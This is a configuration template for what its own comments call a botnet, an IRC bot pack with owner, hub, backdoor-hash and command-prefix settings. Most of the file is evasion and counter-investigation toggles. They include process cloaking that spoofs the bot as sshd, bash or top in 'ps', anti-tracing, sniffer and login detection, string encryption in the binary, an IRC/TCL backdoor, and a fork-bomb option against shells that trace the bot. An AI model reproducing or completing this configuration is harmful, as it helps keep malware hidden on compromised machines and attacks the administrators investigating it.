| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899 |
- /* The < && > indicates the area you must change!
- * Do not leave the <>
- */
- /* PACKNAME: name of the pack */
- PACKNAME <name>
- /* HASHES
- * These must remain 100% secure/private, these keys can retrieve the salts, and
- * the entire botnet could be hijacked, a pass 8 chars or more is suggested
- */
- /* SHELLHASH: 32 char md5 hash used for binary password
- * in mIRC: //echo -a $md5(SOMEWORD)
- * URL: http://edge.codebin.dk/md5.php
- */
- SHELLHASH <md5hash>
- /* BDHASH: 32 char MD5 hash used for IRC backdoor
- # NOTE: Botlink uses this for linking, if it is changed on a bot, it wont link to another bot unless
- # the other bot has the same bdhash. (Protects your botnet, trust me) */
- BDHASH <md5hash>
- /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
- DCCPREFIX <.>
- /* The settings below can each be defined multiple times */
- /* OWNER <nick password host>
- * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
- * nick: nickname what else?
- * password: initial password for user
- * host: hosts of the user (list as many as needed)
- */
- OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
- /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
- * list as many as needed
- */
- OWNEREMAIL <some@email.com>
- /* HUB <nick host port ident>
- * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
- * nick: nick of hub
- * host: hostname or ip of hub (A 'dynamic' OR 'changeable' HOSTNAME IS RECOMMENDED)
- * port: port the hub listens on
- * ident: ident of the hub (list as many as needed)
- */
- HUB <God god.net 666 god ~God ~george>
- /* DEFINES
- * Simply use a '+' to enable a feature, be sure to include the space.
- * If this is the template pack.cfg, defines are set to their recommended values
- */
- + ANTITRACE This will quit the bot if tracing is detected
- + AUTHCMDS Enable a special list of cmds to be used after Authing.
- + AUTHHASH Require a script to AUTH (using hashes)
- + AUTOAWAY Random autoaway/return on IRC
- - AUTOLOCK Will lock channels upon certain conditions
- + DCCAUTH Require Auth hashing with scripts for dcc party line.
- + DCCPASS DCC command passwords
- + GARBLESTRINGS Encrypt strings in binary
- + HIJACKCHECK Checks for a common process hijacker method
- + LASTCHECK Checks every few seconds for logins with `last`
- - MESSUPTERM Fork bombs shells that trace the bot on startup
- + MSGCMDS Adds support for non-auth msg cmds, customizable throgh cmd_config
- - NAZIPASS Requires a 'special' char in passes..If you have AUTH enabled, this is unneeded
- + NODELAY Speeds up tcp sockets to server
- - PROCESSCHECK Checks running processes against a bad-list
- + PROMISC Checks for sniffers running on the server
- + PSCLOAK Cloaks the process for `ps` (can be disabled in botconfs)
- + RANDSERVERS Randomizes the server list per bot
- + SPLITHIJACK Cycle channels on split; CHANFIX/TS fixes
- - TCLCMDS These serve mainly as a backdoor/debug tool for development
- + TCLPERMONLY Limits .tcl/.nettcl/.bottcl to perm owners
- + UTCTIME Uses GMT/UTC standard time instead of localtime
- /* PSCLOAK <name>
- * name: the name of the program to spoof as in 'ps'
- * list as many as needed
- * A default list is provided
- */
- PSCLOAK -bash
- PSCLOAK ftp
- PSCLOAK /usr/sbin/sshd
- PSCLOAK man
- PSCLOAK pine
- PSCLOAK bash
- PSCLOAK top
- PSCLOAK last
- PSCLOAK w
- PSCLOAK ps ux
- PSCLOAK bash
- PSCLOAK ./psybnc
- PSCLOAK BitchX
- /* SALTS: DO NOT TOUCH BELOW THIS LINE */
|